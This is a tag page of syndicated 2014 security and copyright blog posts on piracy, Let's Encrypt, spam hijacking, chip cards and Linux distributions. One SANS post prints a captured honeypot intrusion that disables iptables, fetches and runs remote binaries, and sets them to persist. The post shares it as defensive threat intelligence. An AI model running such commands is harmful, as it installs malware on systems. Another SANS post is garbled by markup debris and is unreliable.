Posts tagged ‘research’

TorrentFreak: Fail: MPAA Makes Legal Content Unfindable In Google

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

wheretowatchThe entertainment industries have gone head to head with Google in recent months, demanding tougher anti-piracy measures from the search engine.

According to the MPAA and others, Google makes it too easy for its users to find pirated content. Instead, they would prefer Google to downrank sites such as The Pirate Bay from its search results or remove them entirely.

A few weeks ago Google took additional steps to decrease the visibility of pirated content, but the major movie studios haven’t been sitting still either.

Last week MPAA announced the launch of WhereToWatch.com, a website that lists where movies and TV-shows can be watched legally.

“WheretoWatch.com offers a simple, streamlined, comprehensive search of legitimate platforms – all in one place. It gives you the high-quality, easy viewing experience you deserve while supporting the hard work and creativity that go into making films and shows,” the MPAA’s Chris Dodd commented.

At first glance WhereToWatch offers a rather impressive database of entertainment content. It even features TorrentFreak TV, although this is listed as “not available” since the MPAA’s service doesn’t index The Pirate Bay.

Overall, however, it’s a decent service. WhereToWatch could also be an ideal platform to beat pirate sites in search results, something the MPAA desperate wants to achieve.

Sadly for the MPAA that is only a “could” since Google and other search engines currently have a hard time indexing the site. As it turns out, the MPAA’s legal platform isn’t designed with even the most basic SEO principles in mind.

For example, if Google visits the movie overview page all links to individual pages are hidden by Javascript, and the search engine only sees this. As a result, movie and TV-show pages in the MPAA’s legal platform are invisible to Google.

Google currently indexes only one movie page, which was most likely indexed through an external link. With Bing the problem is just as bad.

wtw-google

It’s worth noting that WhereToWatch doesn’t block search engines from spidering its content through the robots.txt file. It’s just the coding that makes it impossible for search engines to navigate and index the site.

This is a pretty big mistake, considering that the MPAA repeatedly hammered on Google to feature more legal content. With some proper search engine optimization (SEO) advice they can probably fix the problem in the near future.

Previously Google already offered SEO tips to copyright holders, but it’s obvious that the search engine wasn’t consulted in this project.

To help the MPAA on its way we asked isoHunt founder Gary Fung for some input. Last year Fung lost his case to the MPAA, forcing him to shut down the site, but he was glad to offer assistance nonetheless.

“I suggest MPAA optimize for search engine keywords such as ‘download ‘ and ‘torrent ‘. For some reason when people google for movies, that’s what they actually search for,” Fung tells us.

A pretty clever idea indeed, as the MPAA’s own research shows that pirate-related search terms are often used to “breed” new pirates.

Perhaps it’s an idea for the MPAA to hire Fung or other “industry” experts for some more advice. Or better still, just look at how the popular pirate sites have optimized their sites to do well in search engines, and steal their work.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

LWN.net: EFF: Let’s Encrypt

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

The Electronic Frontier Foundation (EFF) is helping to launch a new
non-profit organization that will offer free server certificates
beginning in summer 2015. “Let’s
Encrypt is a new free certificate authority, which will
begin issuing server certificates in 2015. Server
certificates are the anchor for any website that wants to
offer HTTPS and encrypted traffic, proving that the server
you are talking to is the server you intended to talk to.
But these certificates have historically been expensive, as
well as tricky to install and bothersome to update. The
Let’s Encrypt authority will offer server certificates at
zero cost, supported by sophisticated new security
protocols. The certificates will have automatic enrollment
and renewal, and there will be publicly available records
of all certificate issuance and revocation.
” Let’s Encrypt will be
overseen by the Internet Security Research Group (ISRG), a California
public benefit corporation.

TorrentFreak: MPAA Pays University $1,000,000 For Piracy Research

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

mpaa-logoLast week the MPAA submitted its latest tax filing covering 2013. While there are few changes compared to previous years there is one number that sticks out like a sore thumb.

The movie industry group made a rather sizable gift of $912,000 to Carnegie Mellon University, a figure that neither side has made public before.

This brings the MPAA’s total investment in the University over the past two years to more than a million dollars.

The money in question goes to the University’s “Initiative for Digital Entertainment Analytics” (IDEA) that researches various piracy related topics. During 2012 MPAA also contributed to the program, albeit significantly less at $100,000.

TF contacted IDEA co-director Rahul Telang, who told us that much of the money is spent on hiring researchers and, buying data from third parties and covering other research related expenses.

“For any substantial research program to progress it needs funding, and needs access to data and important stakeholders who care about this research. IDEA center has benefited from this funding significantly,” he says, emphasizing that the research applies to academic standards.

“All research is transparent, goes through academic peer review, and published in various outlets,” Telang adds.

While IDEA’s researchers operate independently, without an obligation to produce particular studies, their output thus far is in line with Hollywood’s agenda.

One study showed that the Megaupload shutdown boosted digital sales while another reviewed academic literature to show that piracy mostly hurts revenues. The MPAA later used these results to discredit an independent study which suggested that Megaupload’s closure hurt box office revenues.

Aside from countering opponents in the press, the MPAA also uses the research to convince lawmakers that tougher anti-piracy measures are warranted.

Most recently, an IDEA paper showed that search engines can help to diminish online piracy, an argument the MPAA has been hammering on for years.

The tax filing, picked up first by Variety, confirms a new trend of the MPAA putting more money into research. Earlier this year the industry group launched a new initiative offering researchers a $20,000 grant for projects that address various piracy related topics.

The MPAA sees academic research as an important tool in its efforts to ensure that copyright protections remain in place, or are strengthened if needed.

“We want to enlist the help of academics from around the world to provide new insight on a range of issues facing the content industry in the digital age,” MPAA CEO and former U.S. Senator Chris Dodd said at the time.

The movie industry isn’t alone in funding research for ‘political’ reasons. Google, for example, heavily supports academic research on copyright-related projects in part to further its own agenda, as do many other companies.

With over a million dollars in Hollywood funding in their pocket, it’s now up to IDEA’s researchers to ensure that their work is solid.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: The NSA’s Efforts to Ban Cryptographic Research in the 1970s

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

New article on the NSA’s efforts to control academic cryptographic research in the 1970s. It includes new interviews with public-key cryptography inventor Martin Hellman and then NSA-director Bobby Inman.

Schneier on Security: Pew Research Survey on Privacy Perceptions

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Pew Research has released a new survey on American’s perceptions of privacy. The results are pretty much in line with all the other surveys on privacy I’ve read. As Cory Doctorow likes to say, we’ve reached “peak indifference to surveillance.”

TorrentFreak: Internet Pirates Always a Step Ahead , Aussies Say

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

aus-featAs the debate over Internet piracy sizzles Down Under, groups on all sides continue to put forward arguments on how to solve this polarizing issue.

The entertainment industries are clear. The current legal framework in Australia is inadequate in today’s market and tough new legislation is required to deter pirates and hold service providers more responsible for the actions of their users.

ISPs, on the other hand, are generally concerned at the prospect of greater copyright liability, with many viewing content availability at a fair price as the sustainable way to solve the piracy problem.

In order to better understand the opinions of the consumer, Aussie telecoms association the Communications Alliance has conducted a new study, the results of which were published this morning.

The survey, carried out among a sample 1,500 Australians, reveals a public split roughly 50/50 on whether piracy is “a problem” but one that also believes that it will eventually end up paying the bill for solving it.

A recurring theme for the prevalence of piracy in Australia is availability of content at a fair price, and the results of the survey appear to back up that belief. A total 60% of respondents said that improved entertainment product release strategies would lead to less piracy while 66% noted that cheaper, fairer pricing could achieve the same.

Just 19% felt that Government regulation resulting in stiff penalties for file-sharers would do the trick, and when it comes to pushing anti-piracy responsibilities onto service providers, almost three-quarters felt the approach would be ineffective.

Unsurprisingly the issue of cost is important for consumers, with 69% holding the opinion that “identifying, monitoring and punishing” ‘pirate’ subscribers would eventually lead to more expensive Internet bills for everyone. When questioned, 60% of respondents felt that the bill for dealing with piracy should be paid by the rightsholders.

Privacy was also an issue for 65% of respondents who said that monitoring Internet users’ downloading habits would have “serious privacy implications.” However, the most popular reason for not shifting responsibility to ISPs is the fact that pirates are always a step ahead, with 72% believing that given rapidly changing technology, a way around any technical measures will always be found.

“This research comes as the Government considers responses to its discussion paper on online copyright policy options. It paints a picture not of a nation of rampant pirates, but rather a majority of people who agree that action taken should include steps to reduce the market distortions that contribute to piracy,” commented Communications Alliance CEO, John Stanton.

While the entertainment companies have their tough demands and the ISPs have their objections, it seems likely that a solution will be found in the middle ground. Better pricing and availability will have an effect on the market while educational campaigns will help to sway some of those sitting on the fence. A total 59% of respondents favored the latter approach.

Whether ISPs will have to play a more active role remains to be seen, but given developments in the UK and United States, a notice-and-notice scheme to warn and educate consumers seems particularly likely.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

lcamtuf's blog: Exploitation modelling matters more than we think

This post was syndicated from: lcamtuf's blog and was written by: Michal Zalewski. Original post: at lcamtuf's blog

Our own Krzysztof Kotowicz put together a pretty neat site called the Bughunter University. The first part of the site deals with some of the most common non-qualifying issues that are reported to our Vulnerability Reward Program. The entries range from mildly humorous to ones that still attract some debate; it’s a pretty good read, even if just for the funny bits.

Just as interestingly, the second part of the site also touches on topics that go well beyond the world of web vulnerability rewards. One page in particular deals with the process of thinking through, and then succinctly and carefully describing, the hypothetical scenario surrounding the exploitation of the bugs we find – especially if the bugs are major, novel, or interesting in any other way.

This process is often shunned as unnecessary; more often than not, I see this discussion missing, or done in a perfunctory way, in conference presentations, research papers, or even the reports produced as the output of commercial penetration tests. That’s unfortunate: we tend to be more fallible than we think we are. The seemingly redundant exercise in attack modelling forces us to employ a degree of intellectual rigor that often helps spot fatal leaps in our thought process and correct them early on.

Perhaps the most common fallacy of this sort is the construction of security attacks that fully depend on the exposure to pre-existing risks of a magnitude that is comparable or greater than the danger posed by the new attack. Familiar examples of this trend may include:

  • Attacks on account data that can be performed only if the attacker already has shell-level access to said account. Some of research in this category deals with the ability to extract HTTP cookies by examining process memory or disk, or to backdoor the browser by placing a DLL in a directory not accessible to other UIDs. Other publications may focus on exploiting buffer overflows in non-privileged programs through a route that is unlikely to ever be exposed to the outside world.

  • Attacks that require physical access to brick or otherwise disable a commodity computing device. After all, in almost all cases, having the attacker bring a hammer or wire cutters will work just as well.

  • Web application security issues that are exploitable only against users who are using badly outdated browsers or plugins. Sure, the attack may work – but so will dozens of remote code execution and SOP bypass flaws that the client software is already known to be vulnerable to.

  • New, specific types of attacks that work only against victims who already exhibit behaviors well-understood to carry unreasonable risk – say, the willingness to retype account credentials without looking at the address bar, or to accept and execute unsolicited downloads.

  • Sleight-of-hand vectors that assume, without explaining why, that the attacker can obtain or tamper with some types of secrets (e.g., capability-bearing URLs), but not others (e.g., user’s cookies, passwords, server’s private SSL keys), despite their apparent similarity.

Some theorists argue that security issues exist independently of exploitation vectors, and that they must be remedied regardless of whether one can envision a probable attack vector. Perhaps this distinction is useful in some contexts – but it is still our responsibility to precisely and unambiguously differentiate between immediate hazards and more abstract thought experiments of that latter kind.

SANS Internet Storm Center, InfoCON: green: Lessons Learn from attacks on Kippo honeypots, (Mon, Nov 10th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A number of my fellow Handlers have discussed Kippo [1], a SSH honeypot that can record adversarial behaviour, be it human or machine. Normal behaviour against my set of Kippo honeypots is randomly predictable; a mixture of known bad IP ranges, researchers or from behind TOR scanning and probing, would be attackers manually entering information from their jump boxes or home machines.

What caught my eye was a number of separate brute force attacks that succeeded and then manifested the same behaviour, all within a single day.Despite the IP addresses of the scans, the pickup file locations and the downloaded file names being different the captured scripts from the Kippo logs and, more importantly in this case, the hashes were identical for the two files [2] [3] that were retrieved and attempted to run on Kippos fake system

So what? you may ask. I like to draw lessons learnt from this type of honeypot interaction which help provide some tactical and operational intelligence that can be passed other teams to use. Dont limit this type of information gather to just the security teams, for example our friends in audit and compliance need to know what common usernames and passwords are being used in these types of attacks to keep them current and well advised. A single line note on a daily report to the stakeholders for security may being in order if your organisation is running internet facing Linux systems with SSH running port TCP 22 for awareness.

Here are some of the one I detailed that would be passed to the security team.

1) The password 12345 isnt very safe who knew? (implied sarcasm)
2) The adversary was a scripted session with no error checking (see the scripts actions below)
3) The roughly two hours attacks from each unique IP address shows a lack of centralised command and control
4) The malware dropped was being reported in VirusTotal a day before I submitted my copies, so this most likely is a relatively new set of scanning and attacks
5) The target of the attack is to compromise Linux systems
6) The adversary hosting file locations are on Windows systems based in China running HFS v2.3c 291 [4] a free windows web server on port 8889 which has a known Remote Command Execution flaw the owner should probably looked at updating.
7) Running static or dynamic analysis of the captured Linux binaries provided a wealth of further indicators
8) The IP addresses of the scanning and host servers
9) And a nice list of usernames and passwords to be added to the never, ever use these of anything (root/root, root/password, admin/admin etc)

Id normally offer up any captured binaries for further analysis, if the teams had the capacity to do this or dump them through an automated sandbox like Cuckoo [5] to pick out the more obvious indicators of compromise or further pieces of information to research (especially hard coded commands, IP addresses, domain names etc)

If you have any other comments on how to make honeypots collections relevant, please drop me a line!”>Recorded commands by Kippo
service iptables stop
wget hxxp://x.x.x.x:8889/badfile1
chmod u+x badfile1
./ badfile1
cd /tmp
tmp# wget hxxp://x.x.x.x:8889/badfile2
chmod u+x badfile2
./ badfile2
bash: ./ badfile2: command not found
/tmp# cd /tmp
/tmp# echo cd /root//etc/rc.local
cd /root//etc/rc.local
/tmp# echo ./ badfile1/etc/rc.local
./ badfile1/etc/rc.local
/tmp# echo ./ badfile2/etc/rc.local
./ux badfile2/etc/rc.local
/tmp# echo /etc/init.d/iptables stop/etc/rc.local
/etc/init.d/iptables stop/etc/rc.local

[1] Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker. https://github.com/desaster/kippo

[2] File hash 1 0601aa569d59175733db947f17919bb7 https://www.virustotal.com/en/file/22ec5b35a3b99b6d1562becb18505d7820cbcfeeb1a9882fb7fc4629f74fbd14/analysis/
[3] File hash 2 60ab24296bb0d9b7e1652d8bde24280b https://www.virustotal.com/en/file/f84ff1fb5cf8c0405dd6218bc9ed1d3562bf4f3e08fbe23f3982bfd4eb792f4d/analysis/

[4] http://sourceforge.net/projects/hfs/
[5] http://www.cuckoosandbox.org/

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Krebs on Security: Still Spamming After All These Years

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

A long trail of spam, dodgy domains and hijacked Internet addresses leads back to a 37-year-old junk email purveyor in San Diego who was the first alleged spammer to have been criminally prosecuted 13 years ago for blasting unsolicited commercial email.

atballLast month, security experts at Cisco blogged about spam samples caught by the company’s SpamCop service, which maintains a blacklist of known spam sources. When companies or Internet service providers learn that their address ranges are listed on spam blacklists, they generally get in touch with the blacklister to determine and remediate the cause for the listing (because usually at that point legitimate customers of the blacklisted company or ISP are having trouble sending email).

In this case, a hosting firm in Ireland reached out to Cisco to dispute being listed by SpamCop, insisting that it had no spammers on its networks. Upon investigating further, the hosting company discovered that the spam had indeed come from its Internet addresses, but that the addresses in question weren’t actually being hosted on its network. Rather, the addresses had been hijacked by a spam gang.

Spammers sometimes hijack Internet address ranges that go unused for periods of time. Dormant or “unannounced” address ranges are ripe for abuse partly because of the way the global routing system works: Miscreants can “announce” to the rest of the Internet that their hosting facilities are the authorized location for given Internet addresses. If nothing or nobody objects to the change, the Internet address ranges fall into the hands of the hijacker (for another example of IP address hijacking, also known as “network identity theft,” check out this story I wrote for The Washington Post back in 2008).

So who’s benefitting from the Internet addresses wrested from the Irish hosting company? According to Cisco, the addresses were hijacked by Mega-Spred and Visnet, hosting providers in Bulgaria and Romania, respectively. But what of the spammers using this infrastructure?

One of the domains promoted in the spam that caused this ruckus — unmetegulzoo[dot]com — leads to some interesting clues. It was registered recently by a Mike Prescott in San Diego, to the email address mikeprescott7777@gmail.com. That email was used to register more than 1,100 similarly spammy domains that were recently seen in junk email campaigns (for the complete list, see this CSV file compiled by DomainTools.com).

Enter Ron Guilmette, an avid anti-spam researcher who tracks spammer activity not by following clues in the junk email itself but by looking for patterns in the way spammers use the domains they’re advertising in their spam campaigns. Guilmette stumbled on the domains registered to the Mike Prescott address while digging through the registration records on more than 14,000 spam-advertised domains that were all using the same method (Guilmette asked to keep that telltale pattern out of this story so as not to tip off the spammers, but I have seen his research and it is solid).

persaud-fbOf the 5,000 or so domains in that bunch that have accessible WHOIS registration records, hundreds of them were registered to variations on the Mike Prescott email address and to locations in San Diego. Interestingly, one email address found in the registration records for hundreds of domains advertised in this spam campaign was registered to a “michaelp77x@gmail.com” in San Diego, which also happens to be the email address tied to the Facebook account for one Michael Persaud in San Diego.

Persaud is an unabashed bulk emailer who’s been sued by AOL, the San Diego District Attorney’s office and by anti-spam activists multiple times over the last 15 years. Reached via email, Persaud doesn’t deny registering the domains in question, and admits to sending unsolicited bulk email for a variety of “clients.” But Persaud claims that all of his spam campaigns adhere to the CAN-SPAM Act, the main anti-spam law in the United States — which prohibits the sending of spam that spoofs that sender’s address and which does not give recipients an easy way to opt out of receiving future such emails from that sender.

As for why his spam was observed coming from multiple hijacked Internet address ranges, Persaud said he had no idea.

“I can tell you that my company deals with many different ISPs both in the US and overseas and I have seen a few instances where smaller ones will sell space that ends up being hijacked,” Persaud wrote in an email exchange with KrebsOnSecurity. “When purchasing IP space you assume it’s the ISP’s to sell and don’t really think that they are doing anything illegal to obtain it. If we find out IP space has been hijacked we will refuse to use it and demand a refund. As for this email address being listed with domain registrations, it is done so with accordance with the CAN-SPAM guidelines so that recipients may contact us to opt-out of any advertisements they receive.”

Guilmette says he’s not buying Persaud’s explanation of events.

“He’s trying to make it sound as if IP address hijacking is a very routine sort of thing, but it is still really quite rare,” Guilmette said.

The anti-spam crusader says the mere fact that Persaud has admitted that he deals with many different ISPs both in the US and overseas is itself telling, and typical of so-called “snowshoe” spammers — junk email purveyors who try to avoid spam filters and blacklists by spreading their spam-sending systems across a broad swath of domains and Internet addresses.

“The vast majority of all legitimate small businesses ordinarily just find one ISP that they are comfortable with — one that provides them with decent service at a reasonable prince — and then they just use that” to send email, Guilmette said. “Snowshoe spammers who need lots of widely dispersed IP space do often obtain that space from as many different ISPs, in the US and elsewhere, as they can.”

Persaud declined to say which companies or individuals had hired him to send email, but cached copies of some of the domains flagged by Cisco show the types of businesses you might expect to see advertised in junk email: payday loans, debt consolidation services, and various nutraceutical products.

In 1998, Persaud was sued by AOL, which charged that he committed fraud by using various names to send millions of get-rich-quick spam messages to America Online customers. In 2001, the San Diego District Attorney’s office filed criminal charges against Persaud, alleging that he and an accomplice crashed a company’s email server after routing their spam through the company’s servers. In 2000, Persaud admitted to one felony count (PDF) of stealing from the U.S. government, after being prosecuted for fraud related to some asbestos removal work that he did for the U.S. Navy.

Many network operators remain unaware of the threat of network address hijacking, but as Cisco notes, network administrators aren’t completely helpless in the fight against network-hijacking spammers: Resource Public Key Infrastructure (RPKI) can be leveraged to prevent this type of activity. Another approach known as DNSSEC can also help.

SANS Internet Storm Center, InfoCON: green: 20$ is 999999 Euro, (Tue, Nov 4th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Newcastle (UK) University researchers claim to have found an exploit for the contactless payment feature of Visa cards. One of the fraud prevention features of these cards is that only small amounts can be charged in touch mode, without requiring a PIN. But the researchers say that simply changing the currency seems to evade these precautions completely, and they built a fake POS terminal into a smart phone that apparently can swipe money from unsuspecting victims just by getting close enough to their wallet.

According to the press release, VISAs response was that they believe that the results of this research could not be replicated outside a lab environment. Unfortunately, there aint too many cases in security engineering history where such a claim held for more than a day or three. If this attack turns out to be true and usable in real life, Visas design will go down into the annals of engineering screwups on par with NASAs Mars Climate Orbiter, where the trajectory was computed in inches and feet, while the thruster logic expected metric information.

Needless to say that the latter episode didnt end all that well.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

SANS Internet Storm Center, InfoCON: green: CSAM Month of False Positives: Appropriately Weighting False and True Positives, (Fri, Oct 31st)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

This is a guest diary submitted by Chris Sanders. We will gladly forward any responses or please use our comment/forum section to comment publicly.”>”>If you work with any type of IDS, IPS, or other”>detection technology then you have to deal with false positives. One”>common”>mistake I see people make when managing their indicators and rules is”>relying”>solely on the rate of false positives that are observed. While false”>positive”>rate is an important data point, it doesnt encompass everything you”>should”>consider when evaluating the effectiveness of a rule or indicator. For”>instance, consider a scenario where you have a rule that looks for a”>specific”>”>alert tcp $HOME_NET any – $EXTERNAL_NET any”>(msg:Random Malware content:|AB BF 09″>B7|”>”>You can see that this rule isnt incredibly”>specific as it examines all TCP traffic for four specific outbound bytes.”>As a”>result, there might be potential for false positives here. In this case, I”>ran”>this rule on a large network over the course of a month, and it generated”>58″>false positive alerts. Using that data point alone, it sounds like this”>rule”>might not be too effective. As a matter of fact, I had a few people who”>asked”>me if I could disable the rule. However, I didnt because I also”>considered the”>number of true positive alerts generated from this rule. Over the same”>period of time this rule generated 112 true positive alerts. This means”>that the rule was effective at catching what it was looking for, but it”>still”>wasn”>”>I mention the word precise, because the false”>positive”>and true positive data points can be combined to form a precision”>statistic”>using the formula P = TP /(TP + FP). This value, expressed as a”>percentage,”>can be used to describe exactly how precise a rule is, with higher values”>being”>more desirable. In the case of our example rule, the rule has 65.9%”>precision,”>meaning that it successfully detected what it was looking for 65.9% of the”>time. That doesnt sound like a rule that should be disabled to me.”>Instead, I”>was able to conduct more research and further tune the rule by looking for”>the”>”>When examining rules and indicators for their effectiveness, be sure”>to consider both true and false positives. You might miss out on favorable”>detection if you don”>”>Blogs:”>”>http://www.chrissanders.org

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Linux How-Tos and Linux Tutorials: How to Find the Best Linux Distribution for a Specific Task

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

kali Linux

If you’re looking for a Linux distribution to handle a specific (even niche) task, there most certainly is a distribution ready to serve. From routers to desktops, from servers to multi-media…there’s a Linux for everything.

With such a wealth of Linux distributions available, where do you start looking when you have a specific task in mind? You start here, with this listing of some task-specific Linux distributions. This intent here isn’t to create an exhaustive list, but to get users pointed in the right direction. For an exhaustive listing of Linux distributions, check out Distrowatch.

Desktop

The task of everyday usage could easily fall to one of many Linux distributions. In fact, most every Linux distribution can handle everyday, desktop use. From internet browsing/work to desktop publishing, social networks…everything you need for getting things done. The choice made will often depend on what type of interface you want (since nearly every distribution can run the apps you need). Are you looking for a more modern, touch-friendly interface? If so, go with Ubuntu and its Unity interface or Fedora and GNOME.

Since the list of desktop distributions is so extensive, here is a list of some of the top distributions and why they should be considered:

  • Ubuntu: Hardware support, touch-friendly interface

  • Mint: One of the most user-friendly distributions available

  • Deepin: Outstanding interface and user-friendly

  • Bodhi: Unique interface, lightweight distribution (also works well on Chromebooks)

  • Arch Linux: A full-featured desktop distribution that focuses on simplicity. 

Audio/Video engineering

When people think of audio/video, they tend to immediately default to Mac. Linux also excels in that playground. With full-blown distributions dedicated specifically to audio/video engineering, you won’t miss a beat or a scene. If you work with multi-media and Linux, you already know there are plenty of tools available (Lightworks, Audacity, Ardour, etc). What you might not know is that there are distributions available that come with everything you need to rock, preinstalled.

So if you’re looking to get your audio or video ready for performance or distribution, take a look at any of these flavors of Linux:

Ubuntu Studio: This is the most widely used multimedia-oriented Linux-based operating system. What is very nice about Ubuntu Studio is that it is optimized, from the kernel up, to be perfectly suited for the high demands made by audio/video editing/creation. The distribution is based on Ubuntu and the desktop is XFCE, so you can be sure it won’t take much from memory or CPU…so it’s all there for your tasks.

Dream Studio: Takes a very similar approach to Ubuntu Studio — with many of the same tools. The primary difference is that Dream Studio uses the Unity interface, for a more modern (and touch-friendly) look.

dream studio

Penetration testing

Although just about any Linux distribution can be used (or tweaked to be used) for this purpose, there are distributions specifically designed to test the security of your network through penetration testing. One of the best distributions you’ll find for this purpose is Kali Linux. This particular take on the Linux distribution incorporates more than 300 penetration testing and security tools to create one of the finest security-minded distributions available. With Kali you can simulate attacks on your network to see exactly what you need to protect your company’s precious data. You’ll find apps like Metasploit (for network penetration testing), Nmap (for port and vulnerability scanning), Wireshark (for network monitoring), and Aircrack-Ng (for testing wireless security).

Development

Most Linux distributions are well-built for development. You’ll find all of the tools available to all distributions. There is, however, one consideration you’ll want to take into account. With versioned distributions (such as Ubuntu), you’ll find updates to developer-crucial packages (such as PHP) often lag well behind rolling release distributions. The top rolling release distributions are:

Enterprise Servers

If you’re looking to serve up large, high-demand websites, or power the backend of your business, there are Linux distributions ready to serve. You can go the fully supported, somewhat proprietary route, like Red Hat Enterprise Linux, or the fully free route with CentOS. What’s important with RHEL is that, when you make your purchase, you can also count on enterprise-grade support. For some companies, that level of support is mission-critical.

Of course, Red Hat isn’t the only game when it comes to fully supported enterprise-grade Linux. There’s also SUSE Linux Enterprise — for both servers and desktops. But that’s not all. You’ll find plenty of enterprise-ready servers in these distributions:

  • CentOS: The free, open source version of Red Hat Enterprise Server

  • Zentyal: A drop-in replacement for Windows Small Business Server. 

System Troubleshooting

If you’re looking to troubleshoot a PC system, a Windows installation, a hard drive, or even retrieve data from a problematic Windows PC, Linux is what you turn to. There are plenty of Linux distributions geared toward troubleshooting a system. Some of the best include:

  • Knoppix: A bootable Live CD (or USB) distribution that offers plenty of diagnostic tools.

  • Ultimate Boot CD: This is the tool you want when you need to do serious hardware diagnosis (from memory, to CPU, to hard drive, peripherals, and more). With UBCD you can also do data recovery and partitioning.

  • SystemRescueCD: This distribution offers plenty of tools focused on system and data rescue.

Education

Linux also excels in the world of education. With tools like Moodle, ITALC, Claroline, and more — Linux has a firm grasp on the needs of education. And like every other niche, there are distributions geared specifically for the world of education. Two of the more popular distributions are:

  • Edubuntu: This is a partner project for Ubuntu Linux. The aim of Edubuntu is to help the educator with limited computer knowledge make use of Linux’ power, stability, and flexibility within the classroom or the home.

  • Uberstudent: Aimed at secondary and higher-education, Uberstudent is a complete, out of the box learning platform. Ubuerstudent was developed by a professional educator who specializes in academic success strategies, post-secondary literacy instruction, and educational technology.

Router

If you’d like to replace the firmware on your current router with a more robust and secure solution, look no further than Linux. By flashing your router with a Linux distribution, you’ll find you enjoy more features and more control over your network experience. Of course, not all routers are flashable with Linux — so you’ll need to do a bit of research on your hardware. If your router is supported, look to these two major projects as your first steps toward more freedom with your network routing.

DD-wrt: This flavor offers tons of features and a very easy interface to help you control those features. You’ll also find plenty of documentation for DD-wrt.

OpenWRT:  This is a Linux distribution for embedded devices…including routers. Like all routers, you’ll control NAT, DHCP, DNS, and more.

Firewall

If you don’t have the budget for firewall devices (such as Cisco), then a Linux firewall might just be the perfect solution. With the incredibly powerful iptables system, Linux makes for outstanding security. And there are plenty of routes to success with a Linux firewall. If you want as near an out-of-the-box solution, take a look at IP Cop. This particular firewall solution is geared toward home and SOHO usage, but offers a user-friendly, web-based interface that doesn’t require a system administrator level of understanding to use.

Of course, if you want absolute control of your firewall, you can also make use of a distribution like CentOS and learn the ins and outs of iptables.

Anonymous use

Finally, if you’re looking for a Linux distribution to use with anonymity, you want Tails.

Tails is a live Linux distribution that aims to leave no trace and aims at protecting your privacy and anonymity. This particular Linux distribution takes great care to use cryptography to encrypt all data leaving the system. Tails is built on Debian and contains all free software.

tails screen capture

There you have it. A sort of guide to help you navigate the waters of use-specific Linux distributions. And as I’ve mentioned before, fundamentally Linux can be made to do whatever you want. Don’t assume you must use a niche- or task-specific distribution to get something done. With just a little know-how, you can make any distribution into exactly what you need.

For more information about Linux distributions, visit the following sites:

Krebs on Security: Chip & PIN vs. Chip & Signature

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

The Obama administration recently issued an executive order requiring that federal agencies migrate to more secure chip-and-PIN based credit cards for all federal employees that are issued payment cards. The move marks a departure from the far more prevalent “chip-and-signature” standard, an approach that has been overwhelmingly adopted by a majority of U.S. banks that are currently issuing chip-based cards. This post seeks to explore some of the possible reasons for the disparity.

emvkeyChip-based cards are designed to be far more expensive and difficult for thieves to counterfeit than regular credit cards that most U.S. consumers have in their wallets. Non-chip cards store cardholder data on a magnetic stripe, which can be trivially copied and re-encoded onto virtually anything else with a magnetic stripe.

Magnetic-stripe based cards are the primary target for hackers who have been breaking into retailers like Target and Home Depot and installing malicious software on the cash registers: The data is quite valuable to crooks because it can be sold to thieves who encode the information onto new plastic and go shopping at big box stores for stuff they can easily resell for cash (think high-dollar gift cards and electronics).

The United States is the last of the G20 nations to move to more secure chip-based cards. Other countries that have made this shift have done so by government fiat mandating the use of chip-and-PIN. Requiring a PIN at each transaction addresses both the card counterfeiting problem, as well as the use of lost or stolen cards.

Here in the States, however, the movement to chip-based cards has evolved overwhelmingly toward the chip-and-signature approach. Naturally, if your chip-and-signature card is lost or stolen and used fraudulently, there is little likelihood that a $9-per-hour checkout clerk is going to bat an eyelash at a thief who signs your name when using your stolen card to buy stuff at retailers. Nor will a signature card stop thieves from using a counterfeit card at automated payment terminals (think gas pumps).

But just how broadly adopted is chip-and-signature versus chip-and-PIN in the United States? According to an unscientific poll that’s been running for the past two years at the travel forum Flyertalk, only a handful of major U.S. banks issue chip-and-PIN cards; most have pushed chip-and-signature. Check out Flyertalk’s comprehensive Google Docs spreadsheet here for a member-contributed rundown of which banks support chip-and-PIN versus chip-and-signature.

I’ve been getting lots of questions from readers who are curious or upset at the prevalence of chip-and-signature over chip-and-PIN cards here in the United States, and I realized I didn’t know much about the reasons behind the disparity vis-a-vis other nations that have already made the switch to chip cards. So  I reached out to several experts to get their take on it.

Julie Conroy, a fraud analyst with The Aite Group, said that by and large Visa has been pushing chip-and-signature and that MasterCard has been promoting chip-and-PIN. Avivah Litan, an analyst at Gartner Inc., said MasterCard is neutral on the technology. For its part, Visa says it also is agnostic on the technology, saying in an emailed statement that the company believes “requiring stakeholders to use just one form of cardholder authentication may unnecessarily complicate the adoption of this important technology.”

BK: A lot of readers seem confused about why more banks wouldn’t adopt chip-and-PIN over chip-and-signature, given that the former protects against more forms of fraud.

